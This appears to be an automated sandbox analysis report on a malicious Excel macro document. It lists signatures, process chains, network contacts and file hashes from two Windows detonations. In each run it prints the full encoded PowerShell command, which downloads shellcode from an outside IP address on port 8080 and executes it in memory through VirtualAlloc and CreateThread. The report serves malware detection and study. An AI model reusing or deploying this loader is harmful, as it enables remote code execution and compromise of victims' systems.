Malware Analysis Report

2024-12-07 15:16

Sample ID 241113-1n6hrayqg1
Target 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f
SHA256 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f
Tags
macro macro_on_action discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f

Threat Level: Known bad

The file 4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Office macro that triggers on suspicious action

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 21:48

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 21:48

Reported

2024-11-13 21:49

Platform

win7-20241010-en

Max time kernel

13s

Max time network

18s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2880 wrote to memory of 2700 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 2700 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 2700 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2880 wrote to memory of 2700 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2700 wrote to memory of 1276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1276 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1276 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1276 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1276 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp"

Network

Country Destination Domain Proto
CH 194.182.164.149:8080 tcp

Files

memory/2880-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2880-1-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

memory/2880-3-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-2-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-9-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-8-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-6-0x00000000001B0000-0x00000000002B0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.cmdline

MD5 63d8a39999eb2ec6d4bcf407f2aeaa01
SHA1 67f0e3558ca78292bf1dfa226e78dbadd9f30ad6
SHA256 2cf45083deeaac7fe14f2ad2d4dd9d83d221952c8f5b6a767e4dae39eb16d959
SHA512 880e0a7f239bd1736dc84afbc77cad2a3414557ad01b0f2a1d2fd05a772b3ca749ea81833676a9b960a0d20f076f1a7cfc5cd457ad161faea855ae5d0eed7182

\??\c:\Users\Admin\AppData\Local\Temp\tv7gbzig.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSC6D15.tmp

MD5 5026443a29e9e7006de9dcb8c70524e1
SHA1 7a63a998109591d51aba0b3c943141ab53a73e25
SHA256 851d5a4c0e8af1da616c615c1fc667ac4bb6856ea7c2dee16ef8eff47533fb6c
SHA512 fa66ae06b2d53841ab451d9c5f13e19af609215204e936d4cee7721b5a8c613933f6351e30385da051fbdae7465d29022fc42709337aed5c891e9db21cfbcf26

C:\Users\Admin\AppData\Local\Temp\RES6D16.tmp

MD5 86454fd99bdaa9255ad7a4559cd8d21b
SHA1 46b547e0a1f8ba27e1fd9d49aa4a97e596b26e4a
SHA256 b6c62692d635bf683a6429726e157daca87023f06f3be0219deb81243649a55d
SHA512 2a766eda9cf724a9a1ff62a0e0259a4854ce8c98a5bec6ad1705ba6f939f95a94599cb5ff2d9f672ce9903619b050a56c393937fac1177185fcef0afa4b327e7

C:\Users\Admin\AppData\Local\Temp\tv7gbzig.dll

MD5 42b655f7508cde94798963a8aa8cb232
SHA1 b5a5f12fe20b066b58a6128b6ce425244cf986b9
SHA256 c9a9cb0f8be26e133e53fb61ca64d89adf09c41c3ebad645f302e29a8010d691
SHA512 cff543f7b4f6c23d91eff1e79caa039d06ec2595d481ce0f76e54a78e114e92bfb65133eff21c09befc5391b212a3469f839be62edc637407b83796ba1051555

C:\Users\Admin\AppData\Local\Temp\tv7gbzig.pdb

MD5 020a6a2789ad17ed649087565397b229
SHA1 487227dabd2ae81077a4de19e30be9960c5837a1
SHA256 073f76a6281e5a34f1879b246c96522e6babefc2114fef20d8ed358dfedaf70e
SHA512 dec9e2d57daf50edd9943e243564664acc0a12f8d1b9c6b74f843eb248e16c9a0816dd71f3d10304735b2ea48fa8d92ae20c30685c21548c1281f88442961128

memory/2880-27-0x0000000071E9D000-0x0000000071EA8000-memory.dmp

memory/2880-28-0x00000000001B0000-0x00000000002B0000-memory.dmp

memory/2880-29-0x00000000001B0000-0x00000000002B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 21:48

Reported

2024-11-13 21:49

Platform

win10v2004-20241007-en

Max time kernel

33s

Max time network

36s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2268.tmp" "c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
CH 194.182.164.149:8080 tcp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 71.208.201.84.in-addr.arpa udp

Files

memory/2176-0-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-1-0x00007FFF4EF6D000-0x00007FFF4EF6E000-memory.dmp

memory/2176-3-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-2-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-4-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-5-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-6-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-8-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-9-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-7-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

memory/2176-12-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-14-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-13-0x00007FFF0C9D0000-0x00007FFF0C9E0000-memory.dmp

memory/2176-16-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-17-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-20-0x00007FFF0C9D0000-0x00007FFF0C9E0000-memory.dmp

memory/2176-19-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-18-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-15-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-11-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-10-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-29-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

memory/2176-30-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgj0fima.qj1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4268-45-0x0000022A51970000-0x0000022A51992000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline

MD5 31010d98ce65c8ce58a910cb6d823e17
SHA1 2101cd82911e30ad13c4c9ffb05bb12c823ca2c0
SHA256 fd2188309eb3acdbbb86e2bdc9ac56fb845618b134fc98d7b8e5cc807b7a9548
SHA512 f4ed598bd84524f0b7660d2d496da81bf15809332214a5ae4617a297ee7af5007a6ee8937a7aaaf13b33f91001797638ba20def87f4eb9b0c6f4bbc9e77330be

\??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
